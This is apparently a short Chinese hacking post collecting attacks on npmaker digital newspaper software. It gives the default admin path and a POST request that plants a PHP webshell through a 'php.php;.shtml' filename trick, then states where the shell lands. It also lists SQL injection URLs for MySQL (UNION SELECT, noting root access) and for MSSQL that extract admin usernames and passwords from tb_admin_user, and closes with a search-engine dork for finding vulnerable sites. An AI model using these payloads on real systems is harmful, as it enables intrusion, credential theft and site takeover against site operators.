npmaker数字报漏洞集合

默认后台 /www/index.php?mod=admin&con=index&act=login 2003系统getshell /www/index.php?mod=admin&con=onepage&act=addpost post [php] onepage%5Bname%5D=phpx&onepage%5Bfilename%5D=php.php;&onepage%5Bcontent%5D=&id=&onepage_submit=%CC%E1%BD%BB [/php] shell地址 /shtml/php.php;.shtml 注入漏洞针对mysql数据库的 /www/index.php?mod=admin&con=deliver&act=view&username=809763517&deliId=-32 UNION SELECT 1,user(),3,4,5,6,7,8,9,10,11,12,13-- 基本是root 针对mssql数据库的 /www/index.php?mod=index&con=Review&act=getallpaper&papertype=scrb' and user>0-- 帐号 a'and (select top 1 tb_admin_user.adminUser from tb_admin_user)>0-- 密码 a'and (select top 1 tb_admin_user.adminPwd from tb_admin_user)>0-- 关键字 技术支持:喜阅网(www.xplus.com) inurl:www/index.php?mod=

发表评论